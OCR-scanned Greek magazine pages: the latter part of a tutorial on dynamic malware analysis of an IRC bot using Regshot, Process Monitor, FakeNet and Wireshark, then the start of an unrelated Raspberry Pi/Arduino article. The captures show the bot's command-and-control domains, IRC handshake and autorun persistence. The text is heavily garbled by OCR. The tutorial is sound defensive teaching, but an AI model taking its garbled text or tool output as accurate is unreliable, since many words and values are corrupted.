αλλιώς ἐχουμε ονομάσει TO malware sample). Αυτή η διεργασἰα όμως 
δεν θα παραμείνει για πολύ. Θα τερματιστεί πολύ γρήγορα kai στη θέση 
της θα προκύψει µία νέα, η οποία θα παραμείνει. Αυτή η δεύτερη εἶναι η 
πραγματικἠ διεργασία rou κακὀβουλου προγράµµατος. Όπως θα naparn- 
ρήσετε, ro πρὀγραμμα θα χρησιμοποιήσει και πάλι Eva ὀνομα υπεράνω 
κάθε υποψίας. Στη δικἠ µας περίπτωση κοντέψαμε να βάλουμε τα γέλια: 
H διεργασία του malware ονομαζόταν firewall.exe! 


3» Βήμα: Επισκόπηση αλλαγών σε registry και σύστημα αρχείων 


To registry αποτελεἰ µια ιεραρχική βάση δεδοµένων που χρησιµοποιείται 
ano ὁλα τα λειτουργικά συστήματα της οικογένειας των Windows. Σε 
αυτή τη βάση διατηρούνται πληροφορίες και ρυθμίσεις σχετικἁ µε TO 
ἶδιο το λειτουργικὀ σύστημα, καθώς και για πολλά ano τα εγκατεστημέ- 
να προγράµµατα. To registry απαρτίζεται ano δύο βασικἀ στοιχεία: Τα 
κλειδιά και τις τιμὲς (keys και values αντἰστοιχα). Τα κλειδιὰ µπορείτε 
να τα φαντάζεστε σαν αντικείμενα, στα οποία αποθηκεύονται διάφορες 
τιμές. Προφανώς, οι τιμὲς εἶναι τα στοιχεία, τα δεδομένα ἡ κάποια xapa- 
κτηριστικἁ που αποθηκεύονται εντὸς των κλειδιών. ‘Eva κλειδὶ μπορεί 
να περιέχει τιμὲς αλλά και πρόσθετα (υπο)κλειδιά, τα οποία µε τη σειρἀ 
τους μπορούν να περιέχουν τιμὲς ἡ πρὀσθετα κλειδιά κ.ο.κ. To registry 
εἶναι αποθηκευμένο σε διάφορες θέσεις του σκληρού δίσκου, ανάλογα µε 
την ἐκδοση του λειτουργικού. Mia κλασικἠ διαδρομή yia την αποθήκευση 
των αρχείων Tou registry εἶναι η C:\Windows\System32\config. Επίσης, 
οι ρυθμίσεις που αφορούν σε ¿vav συγκεκριµένο χρήστη του υπολογιστή 
βρίσκονται στο αρχεἰο C:\Users\ovoya_xpnotn\ntuser.dat. Για va unop£- 
coupe να δούμε αυτό το αρχεἰο πρέπει να πάμε στις ρυθμίσεις προβολἠς 
αρχείων και καταλόγων του File Explorer και va απενεργοποιήσουµε την 
επιλογή για απὀκρυψη κρἰσιμων/σημαντικὠν αρχείων του συστήματος. 
Αναρωτιέστε γιατὶ µας ενδιαφἐρουν όλα αυτά; Μα, βέβαια, γιατὶ τα περισ- 
σότερα malware επιθυμούν να επέμβουν στο registry του συστήματος. 
Πα παράδειγµα, éva malware µπορεί να θέλει να αποθηκεύσει εκεἰ ορι- 
σμένες ρυθμίσεις του ἡ και να προσθέσει τον εαυτὀ του σε κἄποιο κλειδὶ 
του συστήματος (π.χ., σε κἄποιο κλειδὶ που περιέχει προγράμματα τα 
οποία εκτελούνται αυτόματα). Πέρα ano To registry £va malware ενδέχε- 
ται να τροποποιεἰ διάφορα ἆλλα αρχεία, ὁπως επἰσης να διαγράφει ἡ και 
να δημιουργεἰ καινούργια. 


Πα να δούμε ὁλες αυτές τις αλλαγὲς στο σύστημα θα χρησιμοποιήσουμε 
τα εργαλεία Regshot και Process Monitor. Πριν προχωρήσουμε, ὁμως, 
πρέπει va επιστρἐψουµε NGAI στο καθαρὀ snapshot της εικονικὴς nxa- 
vnc. Θα ξεκινήσουμε ue ro εργαλείο Regshot, το onoio αποτελεἰ µια απλἠ 
αλλά πολύ χρήσιμη εφαρμογή. Με τη βοήθειά του μπορούμε να Kpa- 
TNOOUHE στιγμιότυπα του registry αλλά κι ολόκληρου του συστήματος 
αρχείων, ὀπως επἰσης και va συγκρἰνουµε τα στιγμιότυπα μεταξύ τους. 


RváAuon malware, για όλους! Δυναμική προσέγγιση 
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FakeNet Version 1.8 

[Starting program. for help open a web browser and surf to any URL.1 
[Press CTRL-C to exit.1 

[Failed to load Python. all python extensions are disabled.] 
[To enable python. try installing US2888 redistributables.] 
[Failed to load Python. all python extensions are disabled.1 
[To enable python. try installing US2888 redistributables.]1] 
[Modifying local DNS Settings.1 

Scanning Installed Providers 

Installing Layered Providers 

Preparing To Reoder Installed Chains 

Reodering Installed Chains 

Saving New Protocol Order 

[Listening for traffic on port 88.1] 

[Listening for SSL traffic on port 443.1] 

[Listening for SSL traffic on port 8443.1 

[Listening for traffic on port 8080.1 

[Listening for traffic on port 8000.1 

[Listening for traffic on port 1337.1 

[Listening for SSL traffic on port 931333. 1 

[Listening for ICMP traffic.1 

[Listening for DNS traffic on port: 53.1] 


[DNS Query Received.]1 
Domain name: proxima.ircgalaxy.pl 
[DNS Response sent.1 
[Listening for SSL traffic on port 65524. 1 


[Received new connection on port: 65528.] 

SSL Autodetect: NOT SSL 

[Received NON-SSL data on port 65526.1] 
NICK qizxfknu 

JSER o828581 . . : Seruice Pack 3 

JOIN &uirtu 


[DNS Query Received. 1] 
Domain name: l.abelc. 
[DNS Response sent.]1] 
[Listening for SSL traffic on port 8998.] 


[Received new nnection on port: 8998.1] 
SSL fiutodetec NOT SSL 
[Received NON-SSL data on port 8998.1 

PASS PING 
JSER akkuxb akkwxb akkuxb :ymhssytgfuzellap 
NICK xROPdula 


Όπως καταλαβαίνετε, θα δουλέψουμε πάλι ue TO YVWOTO τρὀπο: Θα Kpa- 
τήσουμε Eva στιγμιότυπο πριν κι Eva στιγμιότυπο μετὰ την εκτέλεση TOU 
malware, ὥστε να δούμε av και ποιες αλλαγὲς έγιναν στο σύστημα. Avoi- 
γουµε λοιπὸν το Regshot και πατάμε στο κουμπὰκι Scan diri. Ano κάτω 
γράφουμε «C:\», για να δηλώσουμε στο πρὀγραμμα Ori θέλουμε να Kpa- 
τήσει Eva στιγμιότυπο όλου του σκληρού δίσκου C:. Ακολούθως πατάμε 
στο 1* shot > Shot (πάνω δεξιά). Μετά ano λἰγο χρόνο το πρόγραµµα θα 
EXE] αποθηκεύσει επιτυχώς την τρέχουσα κατάσταση του δίσκου. Σε αυτό 
το σημείο εκτελούμε το κακόβουλο πρόγραµµα και κατόπιν παίρνουμε το 
δεύτερο στιγμιότυπο, πατώντας στο kouuni 2™ shot. Εδὠ ὀµως δεν πρὲ- 
πει va βιαστούμε! Πρέπει να δώσουμε ἑνα-δυο λεπτὰ στο malware, για 
να ολοκληρώσει την ὀποια δραστηριὀτητἁ του. Τέλος, αφού πάρουμε και 
το δεύτερο στιγμιότυπο, πατάμε στο κουμπί Compare, oore να πραγµα- 
τοποιηθεἰ µια σύγκριση μεταξύ των δύο... 


H ανάλυση των αποτελεσμάτων προὐποθέτει µια μικρή euneipia OXETIKA 
µε το τι μπορεί να θεωρηθεἰ κακὀβουλη/επικἰνδυνη αλλαγή και τι OXI. 
Βλέπετε, τα στοιχεία που εμφανίζονται δεν αποτελούν κατ’ ανάγκη το 
αποτέλεσµα κάποιας παράτυπης δραστηριότητας. Υπάρχουν στοιχεία στο 
registry τα οποία ούτως ἡ ἄλλως μεταβάλλονται πολύ συχνὰ. Στο δικό 
μας πεἰραμα, πάντως, εντοπἰίσαμε αρκετά ενδιαφἐροντα πράγματα. Πα 


Εικόνα 9 

To FakeNet εν δρά- 
σει: Μόλις έπιασε 
τις προσπάθειες 
του κακόβουλου 
αρχείου να συν- 
δεθεί σ’ ἑνα IRC 
botnet! 
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παράδειγµα, στην ενότητα Values added η πρώτη εγγραφή δείχνει ότι 
TO malware πρὀσθεσε το δήθεν χρήσιμο αρχείο που δημιουργεί (θυμη- 
θεἰτε την επισκόπηση διεργασιών στο προηγούμενο βήμα) στη λίστα µε 
τα προγράµµατα nou ξεκινούν αυτόματα. Στην ενότητα Files added και 
Files deleted επιβεβαιώνουμε επἰσης τη διαγραφή του αρχείου bot.exe και 
τη δηµιουργία του firewall.exe, μέσα στον φάκελο Windows\System32. 
Με το πἐρασμα του χρὀνου και την ανάλυση μερικών ακόµα malware της 
επιλογἠς σας, θα εἰστε σε θἐση va αντιλαμβάνεστε εὐκολα και γρήγορα 
ποια στοιχεἰα παρουσιάζουν ενδιαφἑρον. 


Στην περίπτωση nou θεωρεῖτε απλοϊκά τα αποτελέσµατα rou Regshot, 
μπορούμε να γίνουμε αρκετά πιο σκληροπυρηνικοἱ και να στραφούμε στο 
Process Monitor. Πρόκειται για ἑνα ακόµα εργαλείο που φτιάχτηκε αρχι- 
kå ano την εταιρεία Wininternals και πλέον ανήκει στη σουἰτα Windows 
Sysinternals. To Process Monitor μπορεί και καταγράφει όλες τις διαδι- 
κασίες, καθὼς και ὀλες τις επεμβάσεις στο Registry και στα αρχεία του 
συστήματος. Και όταν λέμε «ὀλες», το εννοούμε! Πρὀκειται yia Eva po- 
ναδικὀ εργαλεἰο, που προσφέρει τόνους πληροφοριών στο χειριστή. Χμ. 
Κι όταν λέμε «τόνους», δυστυχώς κυριολεκτούμε για ακόμα μία φορὰ! 
Βλέπετε, µε το που ανοίγουμε το Process Monitor, ακόµη κι αν το OÙ- 
στηµα εἶναι φαινομενικά αδρανὲς, στο παράθυρο του προγράµµατος θα 
δούμε vav καταιγισμὀ ενεργειών. AUTO συμβαίνει γιατὶ στην πραγµατι- 
κότητα το σύστημα δεν εἶναι NOTE αδρανές. To μυστικὀ για να εξάγουµε 
τις χρήσιμες πληροφορἱες σχετικἁ µε το malware, βρίσκεται στη χρήση 
των φίλτρων (filters) του Process Monitor. Με τα φίλτρα μπορούμε va 
δώσουμε οδηγἱες στην εφαρμογἠ, WOTE να εμφανίσει μόνο τις ενέργει- 
ες που εκτελούνται απὀ κάποιο συγκεκριμένο πρόγραμμα ἡ διεργασία. 
Πριν προχωρήσουμε, ὁμως, πρέπει να επαναλάβουµε την κλασική, πλέον, 
ενέργεια: Na επαναφἑρουµε την εικονικἠ μηχανὴ στην αρχικἠ (και καθα- 
pn) κατάσταση, χρησιμοποιώντας το σχετικὀ Snapshot. Κατόπιν avoiyou- 
µε το Process Monitor και του δίνουμε λίγο χρόνο ώστε να καταγράψει 
τα 00d cuppaivouv στο σὐστημά µας (η karaypagr| ξεκινά αυτόματα). 
Ακολούθως τρέχουμε TO malware sample και δίνουμε NAA! λίγο χρόνο στο 
Process Monitor. Αμέσως μετά σταματάµε την καταγραφή, πατώντας το 
τρίτο κουμπάκι ano αριστερἁἀ στη μπάρα εργαλείων (auró µε τον HEYE- 
θυντικὀ pako). Έχουμε ropa μπροστὰ µας µια λίστα µε δεκάδες χιλιάδες 
γραμμές, καθεμία απὀ τις οποἰες αντιστοιχεἰ σε κάποια ενέργεια, κάποιας 
διεργασίας. Πα κάθε uia anó αυτὲς τις διεργασίες βλέπουμε τη χρονικἠ 
στιγµή που εκτελέστηκε, το ὀνομὰ της, το ID, το εἶδος της ενέργειας nou 
πραγματοποίησε (π.χ., RegOpenKey), την αντίστοιχη διαδρομὴ και το ap- 
χείο, την ἐκβαση της ενέργειας και πολλὲς ἄλλες πληροφορἰες! Πατώντας 
το 60 κατὰ σειρὰ κουμπάκι ano αριστερά, ανοίγει Eva παράθυρο yia τη 
διαχείριση των φίλτρων. Ένα απλὀ φίλτρο που μπορούμε va κατασκευἀ- 
coups εἶναι το εξἠς: «Process Name - is - bot.exe - then Include». Αυτό 
λέει στο πρόγραµµα να εμφανίζει μόνο τις ενέργειες της διεργασίας bot. 
exe. Φυσικά, αυτό το φίλτρο θα πρέπει va το προσαρμόσετε κατάλληλα 
και στη θέση rou bot.exe να βάλετε το ὀνομα nou εἶχατε δώσει εσεὶς στο 
malware sample. Μόλις πατήσουμε Add και ΟΚ, το πρόγραμμα θα κρύψει 
OAEG τις περιττὲς γραμμές και θα διατηρήσει μόνον αυτὲς που σχετίζονται 
με ro uno εξέταση malware. Ακολούθως, μπορούμε να ψάξουμε µέσα σε 
αυτά τα αποτελέσµατα, κατασκευάζοντας Eva πρὀσθετο φίλτρο. Αυτή τη 
φορὰ θα ψάξουμε yia την ενέργεια Process Create, ὡστε να βρούμε ro 
ὀνομα της διεργασίας που δημιουργήθηκε ano ro bot.exe. Με αυτή τη 
γνώση μπορούμε va ανανεώσουμε το πρὠτο φίλτρο, ώστε να περιορἰ- 
σουµε ακόµη περισσότερο τα δεδοµένα που εμφανίζει TO πρὀγραμμα. Στο 
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packets 20130128 210156.pcap [Wireshark 1.8.4 (SVN Rev 46250 from /trunk-1.8)] 
ipie tdt e E Ter Wea MTS MH 


Baaeacuxesnueseoezrz£ií5BsaaamnawemSxiu 
..,, .,.,.,.,,,, MN IL 


No. Time ‘Source J i ‘Protocol Length Info ! 


113.214622 127. 


0.0.2 40 sentinel > gt-proxy [ACK] Seq=1 Ack=1 win=1024 L 
12 3.214622 127.0.0.2 127. 


1 
SUE TCP 111 sentinel > gt-proxy [ACK] 5εη-1 Ack=1 win-1024 L 


Follow TCP Stream 


Stream Content 


PASS PING 
USER wwxzfu wwxzfv wwxzfv :thwgwhloxllhakgz 
μα pnhmtnib 


Entire conversation (71 bytes) 


Eind Save As Print © asc © EBCDIC © Hex Dump O C Arrays 
Filter Out This Stream 


p. PASS PIN 


(> 


G..USER wwxzfv 
fv :th - 
Profile: Default. 
κ 23:20 μμ 

δικὀ µας παράδειγµα, η νέα διεργασία εἶχε αυτή τη φορά ὀνομα winamp. Εικόνα 10 
exe! Όπως βλέπετε στις OXETIKEG εικόνες, προσθέτει τον EAUTO της στα ob Dcap, 
προγράμματα που ξεκινούν αυτόματα µε το σύστημα, αλλά η δράση της Yeeeah Ae ae 
δεν σταματά εκεί. Όπως αντιλαμβάνεστε, σε auró το στάδιο απαιτείται FakeNet, κὀλ- 
και πάλι µια κἄποια εμπειρία, η οποία µπορεί να αποκτηθεί µε πειραµατι- λιστα µπορεί va 
OHO κι εξάσκηση. διαβαστεί απὀ ro 
Wireshark. 


4° Βήμα: Καταγραφή και ανάλυση κακὀβουλης δικτυακἠς κίνησης 


Τελευταίο βήμα στη δυναμική ανάλυση rou malware εἶναι η καταγρα- 
PÅ της δικτυακἠς δραστηριότητας. Μας ενδιαφἑρει να μάθουμε nog και 
τι λέει µε το δημιουργό του, ὥστε να κατανοήσουμε και την αποστολἠ 
του. Σε αυτήν την προσπάθεια θα µας βοηθήσουν τα εργαλεία FakeNet 
και Wireshark. Νομίζουμε oT! To Wireshark δε χρειάζεται ιδιαίτερες ou- 
στάσεις. Πολύ απλἀ, πρὀκειται για Eva κορυφαίο εργαλεἰο ανάλυσης της 
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T AMD PCNET Family Ethernet Adapter (Microsoft's Packet Scheduler) : Device\NPF_{B6£2B005-0C09-4D30-AAB4-6C6AE357A2B2} [Wi... 
Eile 


Edit View Go Capture 


SEE 


Analyze Statistics Telephony Tools Internals Help 


SHeeee SHxXxSS8\'4¢90F S| 


Ἐ|8|! ει ει αι ΓῚ |! a mmx] 


Filters | 
No. a 


Time 


0. 00149800 19 


30.5520110 192.168. 
7 30.5540550 192.168. 
61.0953750 192.168. 
61. 0969040 192.168 


13 91.6744620 192.168. 
14 91.6768170 192.168. 


Source 
0. 00000000 192.168. 56.7 


| Expression... Clear Apply Save 


Protocol Info 


Destination 


Lenath 
24 


235:2552255:2255 
192.168.56.255 
258.255:2535:255 
192.168.56.255 
192.4 E 


DB-LSP- 
DB-LSP- 


245 Dropbox LAN sync 51 ΞΕΡΕΙ; ΕΠΟΣ ΕΗῚ 
cu DEBEO LAN sync Discovery. Protocol 


255.255.255.255 


D 
192.168.56.255 DB-LSP- 245 aranha LAN qs WIscovery Protocol 


K 


Œ Frame 1: 245 bytes on wire (1960 bits), 245 bytes captured (1960 bits) on interface 0 

m Ethernet II, Src: cadmusco 00:34:14 (08:00:27:00:34:1d), Dst: Broadcast (ff:ff:ff:ff:ff:ff) 
5 Internet Protocol version 4, src: 192.168.56.1 (192.168.56.1), Dst: 
& User Datagram Protocol, src Port: db-Tlsp-disc (17500), Dst Port: db-lsp-disc (17500) 
= Dropbox LAN sync Discovery Protocol 


255:285:295:2950(255.58:0 88.2885 


ff ff ff ff 
56 
5c 
74 
65 
20 
22 


[0000 
0010 
[0020 
0030 
0040 
0050 
0060 


08 00 27 00 34 1d 08 00 45 OO ........ * aa ere Es 

80 11. 30 O7 cê: a8 38 Ol ff ff ...ν..... Dues 8... 

00 d3 [4 df 7b 22 68 ef 73 74 οκΏλο νεα. ss abl 

20 32 39 30 38 32 31 34 32 2c . int": 2 9082142, E 
69 6f Ge 22 3a 20 5b 31 2c 20 “versio n": [1, 

69 73 70 6c 61 79 6e 61 6d 65 8], "dis playname 

30 35. 32 31 84 32 2c 22 ": "2908 2142", " ν 


Εικόνα 11 
Ποιος εἰπε ὁτι TO 
Wireshark δεν 
μπορεί να µας 
βοηθήσει κι απὀ 
µόνο του; Εδώ 
βλέπουμε την 
καταγραφή των 
NetBIOS request, 
yia ra κακόβου- 
λα domains που 
χρησιμοποιεί TO 
bot. Προσέξτε ὁτι 
το πρώτο απὀ αυτά 
δεν εμφανίστηκε 
στο FakeNet... 
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| Profile: Default 


δικτυακἠς κἰνησης. Αφιερώστε λίγο χρόνο στην εκμάθηση rou και να 
εἰσαστε σίγουροι ότι δεν θα πάει χαμένος. Το FakeNet, ano την ἄλλη, δεν 
εἶναι και τόσο γνωστὀ. Δημιουργήθηκε ano τους συγγραφεἰς του (πολύ 
δυνατού) βιβλίου Practical Malware Analysis. To FakeNet δημµιουργεἰ Eva 
ψεύτικο δίκτυο µε ψεύτικες υπηρεσίες (n.x., DNS, HTTP server κ.ἀ.), στο 
οποίο προωθεἰ όλα τα αιτήματα του συστήµατος που σχετίζονται µε το 
δίκτυο. Μ΄ αυτὀν τον τρόπο, ακόµη κι αν o (φυσικὀς ἡ εικονικὀς) υπολογι- 
στἠς δεν εἰναι online, ἑνα malware που ρωτάει, π.χ., ποια εἶναι η «IP Tou 
domain name deltahacker.gr», θα πάρει απάντηση ano τον ψεύτικο DNS 
server του FakeNet. Έτσι, νομίζοντας ori εἶναι συνδεδεμένο στο Internet, 
θα συνεχίσει τη λειτουργία του κανονικἁ και θα αποκαλυφθεἰ η µετέπει- 
τα δράση του (σε noia θύρα συνδέεται, τι προσπαθεἰ να στείλει, µε ποιο 
πρωτόκολλο επικοινωνεί κ.ο.κ.). Παράλληλα, ro FakeNet παρατηρεί όλα 
τα πακέτα που ταξιδεύουν εντὀςτου WEUTIKOU δικτύου και τα αποθηκεύει 
σε Eva αρχείο τύπου pcap (packet capture). AUTO ro αρχείο μπορούμε 
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αργότερα va το ανοϊξουµε και va το αναλύσουμε µε ro Wireshark. Ας ra 
δούμε όλα αυτά στην πράξη. 


Κατά τα γνωστὰ, ξεκινάμε φορτώνοντας το καθαρὀ snapshot της εἰκονι- 
κἡς μηχανής. Μετά ξεκινάμε ro FakeNet και περιμένουμε λίγο, μέχρι να 
εμφανιστούν τα μηνύματα που µας ενημερώνουν για τη λειτουργία του 
προγράμματος (av To firewall των Windows εμφανίσει κἄποιο μήνυμα na- 
τάμε στο Unblock). Όταν εἶναι ἐτοιμο το ψεύτικο δίκτυο, εκτελούμε για 
ακόµη uia φορὰ το malware sample. Αυτομάτως βλέπουμε στο παράθυρο 
της κονσόλας να εμφανίζεται η δικτυακἠ δράση του αρχείου. Τι παρατη- 
ρούμε εδώ; Ὅπως φαίνεται και στην εικόνα 9, το bot αναζητά δύο domain 
names (proxima.ircgalaxy.pl και l.abelc.com). Το FakeNet απαντάει και 
TO bot συνδέεται σε διαφορετικἠ port σε κάθε server. Όπως βλέπετε 
στην ἰδια εικόνα, στέλνει κι ορισμένες εντολὲς το ἀτιμο! Av ανοίξετε το 
deltaHacker 011 και πάτε στο άρθρο για την κατασκευὴ £vóc botnet, θα 
διαπιστώσετε αμέσως OTI οι EVTOAEG που στέλνει το malware ουσιαστικά 
αποτελούν EvTOAEG του πρωτοκόλλου IRC. Εν ολίγοις, το malware που 
εξετάζουμε προσπαθεἰ να συνδεθεὶ σε Eva ωραιότατο IRC botnet! To τι 
EVTOAEG µπορεί να λάβει ano εκεὶ κι ἐπειτα εἶναι ἄλλο ζήτημα. Δεν εἶναι 
πολύ δύσκολο να το ανακαλύψουμε, αλλά θα πρέπει να στήσουμε évav 
τοπικὀ IRC server και να παραστήσουμε OT! εἰμαστε εμεὶς πίσω απὀ το 
IRC botnet... Πα ἄλλη µια φορά, αυτὸ το θέμα ἐχει αναλυθεί στο τεύχος 
011 και θα σας το αφήνουμε ως άσκηση :) Τέλος, κλείνοντας το παράθυ- 
po της κονσόλας του FakeNet, μπορούμε να εξετάσουμε το αρχείο pcap 
που δημιουργήθηκε αυτόματα. Φυσικά, αυτἠ η εξέταση θα γίνει µε το 
Wireshark. 


Επίλογος 


Αν κάνετε µια ανασκόπηση στα ὁσα ανακαλύψαμε για το malware sample 
μας, θα διαπιστώσετε ὁτι δεν εἶναι λίγα! Ωστόσο μόλις ανοἰξαµε την nóp- 
τα σε ἐναν ολόκληρο κόσμο. Εἶναι πολλά τα πράγματα που έχουμε va 
μάθουμε ακόμα, πάνω στο θέμα της ανάλυσης malware. Φυσικά, ορι- 
σµένα ano αυτά θα τα δούμε pači, σε επόμενα άρθρα. Μέχρι τότε θα 
περιμένουμε τα αποτελέσµατα και τα σχόλια απὸ τις δικὲς σας δοκιμές, 
μέσω των γνωστῶν καναλιὼν επικοινωνίας: To forum που βρίσκεται στο 
deltahacker.gr, η fan page µας (facebook.com/deltaHacker), o λογαρια- 
σμὀς στο twitter (twitter.com/deltaHacker) ἡ ακόµη και το naAió, καλό 
email (talk2usQdeltahacker.gr). 


bu GiannouG 


Sk111: 
Intermediate 


Tags: Arduino, 
Raspberry Pi, 
Python 


To Arduino το έχουμε ξετινάξει, £60 στο 
περιοδικὀ. Έχουμε ασχοληθεί μαζί του 
πολλές φορές κι EXOUPE δει απὀ απλοϊκὲς 
έως πολύ προχωρημένες κατασκευἑς. 

To Arduino ἐχει ξεκινήσει µια νέα μόδα: 
Αυτή TOV μικροσκοπικὠν συσκευών, 
που μπορούν να κάνουνε napa πολλά µε 
ελάχιστο κόπο και πολύ µικρή κατανάλωση. 
Όπως ἦταν φυσικὀ, αυτή η μόδα οδήγησε 
στη δημιουργία κι ἄλλων παρόμοιων 
συσκευών. Κάποιες εἶναι πιο αδύναμες ενώ 
άλλες εἶναι πολύ πιο ισχυρὲς και μπορούν 
ακόµη και να αποκωδικοποιούν βίντεο HD 
σε npayparikó χρόνο! H πλέον δημοφιλἠς 
πλατφόρμα που μπορεί va φέρει εις πέρας 
τόσο βαριὲς εργασίες εἶναι TO Raspberry Pi 
και, εἶναι γεγονὀς, óri δεν ἐχουμε μιλήσει 
αρκετά yi’ αυτὀ. Κακώς. 


To Arduino Ka- 
τάφερε να γίνει 
συνώνυμο TOU 
hardware hacking, 
βοηθώντας αρκετὀ 
κόσµο va μπει 
στον κόσµο των 
ηλεκτρονικών και 
του hardware γενι- 
Κότερα. 


Η ἐξοδος HDMI, η 
δυνατότητα ανα- 
παραγωγής βίντεο 
HD σε πραγµατικὀ 
χρόνο και το Linux 
(π.Χ., το Rasbian) 
αποτελούν µε- 
ρικούς λόγους 

που κάνουν τους 
απανταχού geek va 
λιγουρεύονται TO 
Raspberry Pi :D 
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To Raspberry Pi εἶναι ἑνας ολόκληρος υπολογιστής σε pè- 
γεθος πιστωτικἠς κάρτας! Αναρωτιέἑστε τι κοινὸ ἐχει TO 
Arduino και ro Raspberry Pi; Mati κἄποιος να επιλέξει 
το ἑνα ano τα δύο, για ro project rou; liari va µπει 
στη διαδικασία της σύγκρισης κἄποιος και να µη 
δουλέψει *kai* µε ra δύο; Εφόσον ro Raspberry 
Pi εἶναι ισχυρότερο, γιατὶ να µην το xpnoipo- 
ποιήσουμε ως Eva Arduino; Στο παρὀν åp- 
θρο σκοπεύουµμε να απαντήσουμε σ’ ὁλες 
αυτές τις ερωτήσεις. 


Τεχνολογικἠ διαφοροποίηση 


H απλότητα του Arduino και οι ἄπειρες πληρο- 
φορίες που μπορεί να βρει κανεἰς για αυτό, το KA- 
θιστούν την ιδανικἠ επιλογή για κάθε αρχάριο. Όπως 
αναφέραμε και προηγουμένως, η ὑπαρξη rou Arduino Boñ- 
θησε να αναπτυχθούν πολλὲς πλατφόρμες. Αυτό που δεν εἰπαμε 
εἶναι ὁτι το κόστος όλων αυτών κυμαἱνεται στα ἴδια περίπου επίπεδα. 
Γιατὶ λοιπόν να επιλέξει κανεὶς To Arduino, órav pe ra ἴδια χρήματα µπορεί 
να αγοράσει ro Raspberry Pi; Πα να κατανοήσει κανεὶς το yiari, πρέπει 
να εμβαθύνουμε σε µερικἀ τεχνικἀ ζητήματα. Το μόνο κοινὸ που ἐχουν 
αυτὲς oi δύο πλακέτες εἶναι ὁτι μπορούν να αλλάζουν την λογική κατά- 
σταση σε μερικούς απὀ τους ακροδέκτες τους, ενώ και οι δύο διαθέτουν 
£va ταμπελάκι Open Source. Ano ‘kei και πέρα, πρὀκειται για δύο εντελώς 
διαφορετικἀ φρούτα... 


To Arduino εἶναι µια πλακέτα µε ἑναν µικροελεγκτή, ο οποίος εἶναι κάτι 
σαν επεξεργαστής µε ορισμένα βασικἁ περιφερειακά. O συγκεκριμένος 
HIKPOEAEYKTNG ἐχει μερικούς ακροδέκτες, τους οποίους εἰμαστε σε θέση 
να χειριστούμε µέσω των προγραμμάτων µας. Ἔτσι, μπορούμε εύκολα v’ 
ανάβουµε LED ἡ και να διαβάζουμε την κατάσταση μερικών διακοπτὠν. 
Φυσικά, µε το Arduino δεν µένουµε εκεἰ! Μπορούμε να επικοινωνήσουµε 
µε άλλα εξαρτήματα, ὀπως οθὀνες χαρακτήρων, οθόνες γραφικών, ολο- 
κληρωμένα κυκλώματα, αισθητήρες ἡ και ολόκληρα συστήματα, ὁπως 
µια πλακέτα για τη σύνδεση στο Internet και πάει λέγοντας. Το Arduino 
εἶναι φτιαγμένο για να συντονίζει διαφορετικἁ εξαρτήματα και πάντα θα 
κάνει τη συγκεκριμένη δουλειὰ ασταμάτητα και µε απίστευτη χρονικἡἠ 
ακρίβεια. Εἶναι δηλαδὴ µια συσκευἠ που απευθύνεται σε αρχάριους αλλά 
και σε πολύ προχωρημένους χομπίστες. Ωστόσο, δύσκολα θα βρούμε 
τους συγκεκριμένους μικροελεγκτὲς σε εμπορικἁ προϊόντα. 


Ας δούμε και το Raspberry Pi τώρα. Αυτὀ δεν βασἰζε- 
ται σε κἄποιον μικροελεγκτὴ, αλλά σε Eva SOC 
(System on Chip). Το εν λόγω SoC περιλαμ- 
βάνει ὁλα ra ζωτικά συστήµατα ενὸς *kavo- 
vikoU* υπολογιστή. Μέσα του συναντάμε 
ἑναν επεξεργαστἡ ARM, τη μνήμη RAM, 
τον επεξεργαστἠ γραφικὠν και δεκάδες 
ακόμα κυκλώματα, τα οποία εξασφαλἰ- 
ζουν την οµαλἠ λειτουργία rou Raspberry 
Pi. Αυτὸ το 5ος, ὅμως, περιλαμβάνει και 
μερικούς ψηφιακούς ακροδέκτες, ONWG εκεἰ- 
vouc Tou Arduino. Κάποιοι ano αυτούς χρησι- 
μοποιούνται για την enikorvovia µε pia κάρτα 
SD, αλλά υπάρχουν κι αρκετοἰ ελεύθεροι! Na- 


Μετατρέψτε το Raspberry Pi oe Arduino! 
ri 


ρεμπιπτόντως, va αναφέρουμε ὁτι 
οι εν Àóyo ακροδέκτες ονομάζο- 
νται GPIO, απὀ το General Purpose 
Input/Output. Όπως υποψιάζεστε, 
αυτοί οι ακροδέκτες θα μπορού- 
σαν να χρησιμοποιηθούν για την 
επικοινωνία µε οποιοδήποτε ἆλλο 
ηλεκτρονικὀ εξάρτημα ἡ ακόµη και 
κύκλωμα. Έτσι, προκύπτει Eva νέο 
ερώτημα: Εφόσον *kai* το Arduino 
*kal* To Raspberry Pi διαθέτουν 
GPIO, yiari δεν αγοράζουν ὁλοι το 
κατά πολὺ ισχυρὀτερο Raspberry 
Pi; 

Το γεγονὸς ὁτι μπορούμε να ελέγχουμε μερικά GPIO µέσω κὠδικα, δεν 
σημαίνει óri το Raspberry Pi µπορεί να αντικαταστήσει εὐκολα το Arduino. 
Βλέπετε, To Arduino ανέχεται τα λάθη συνδεσµολογἰας που µπορεί να Kå- 
νει ἑνας χρήστης και δεν μασάει µε τα BpaxukukAopara. Ano την άλλη, 
ΤΟ Rapsberry Pi ὀχι μόνο δε θα ανεχόταν Eva βραχυκύκλωμα, αλλά πιθα- 
νότατα θα καταστρεφόταν ολοσχερώς! Βλέπετε, το SOC δεν εἶναι σχεδι- 
ασμένο για να ανάβει λαμπάκια, οὐτε διαθέτει τις δικλείδες προστασίας 
που ἐχει ο μικροελεγκτἠὴς του Arduino. Το SoC rou Raspberry Pi εἶναι 
σχεδιασμένο για να επικοινωνεί µε συστήµατα, τα onoia ¿xouv σχεδιαστεὶ 
anó επαγγελματίες ηλεκτρονικούς μηχανικούς. Επιπρὀσθετα, το SoC λει- 
τουργεὶ στα 3.3 Volt και δεν μπορεί να μιλήσει an’ ευθείας µε εξαρτήματα 
ἡ τσιπάκια που απαιτούν 5V. Έτσι, η διασύνδεση rou Raspberry Pi µε τα 
περισσότερα εξαρτήματα που χρησιμοποιούν οι χομπίστες εἶναι δύσκολη 
και μπορεί εὐκολα να οδηγήσει σε (καταστροφικἀ) λάθη. 


To Raspberry Pi σε ρόλο Arduino 


Και αφού σας βομβαρδίσαμµε µε τις δυσκολίες και τους κινδύνους που 
κρύβει η χρήση rou Raspberry Pi ως Arduino, μπορούμε ropa να δού- 
µε nog γίνεται κἀτι τέτοιο :D To Arduino ro προγραμματίζουµε and τον 
υπολογιστή µας, χρησιμοποιώντας To Arduino IDE και µια ελαφρὠς τρο- 
ποποιημένη εκδοχἠ της γλὠσσας C++. Το Arduino IDE συνοδεύεται και 
